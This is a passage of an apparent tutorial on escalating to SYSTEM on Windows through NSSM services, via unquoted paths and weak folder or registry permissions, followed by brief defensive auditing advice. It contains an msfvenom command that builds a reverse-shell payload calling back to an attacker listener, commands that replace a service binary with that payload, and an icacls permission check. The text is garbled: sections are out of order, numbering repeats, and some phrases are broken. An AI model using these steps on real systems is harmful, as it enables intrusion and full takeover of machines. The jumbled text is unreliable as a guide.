An attacker changes the Application string value within the registry to point to a malicious payload (e.g., cmd.exe or a reverse shell). When the service cycles, the payload runs as SYSTEM.

3. Unquoted Service Paths

Disclaimer: This breakdown is for educational purposes and authorized penetration testing only.

Step 1: Enumeration & Identification
move "C:\Program Files\Amateur Service\app.exe" "C:\Program Files\Amateur Service\app.exe.bak"
move service.exe "C:\Program Files\Amateur Service\app.exe"

Tools like icacls.exe are foundational here. If the output reveals that BUILTIN\Users or Everyone has (F) Full Control or (M) Modify permissions on the folder, the directory is vulnerable:

icacls "C:\Path\To\NSSM\Service"

Step 3: Payload Generation & Replacement

If they lack service control privileges, they simply wait for an administrative reboot or a system update to force a power cycle. Once triggered, the reverse shell executes, granting the attacker an interactive command prompt running as NT AUTHORITY\SYSTEM.

Updated Defense and Remediation Guide
Enable auditing for HKLM\SYSTEM\CurrentControlSet\Services\ and alert on modifications to the Parameters subkey made by non-administrative users.
Enable Windows Event Auditing to track changes to services and registry keys, including the event logged when a new service is installed.
Configure Endpoint Detection and Response (EDR) agents to block any write operations to .exe and .dll files inside production application paths by non-admin identities.

Conclusion

If the path to the NSSM executable contains spaces and is not enclosed in quotation marks, Windows can be tricked.
Defenders can spot NSSM privilege escalation attempts by monitoring specific artifacts:
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4444 -f exe -o payload.exe

Step 3: Triggering Execution
If exploiting , the attacker renames the original executable and places their payload.exe in its place using the original filename.
If the path to the NSSM executable or the application binary contains spaces and is not enclosed in quotation marks (e.g., C:\Program Files\Service Folder\nssm.exe), Windows tries to execute each prefix of the path that ends at a space before reaching the intended binary. An attacker with write access to C:\ or C:\Program Files\ can drop a malicious file named Program.exe to intercept the service launch.

3. Weak Registry Permissions

If they lack service control permissions, they may wait for a system reboot if the service startup type is set to Automatic. Once executed, the attacker receives a shell with SYSTEM privileges on their listener.

Updated Mitigation and Defense Strategies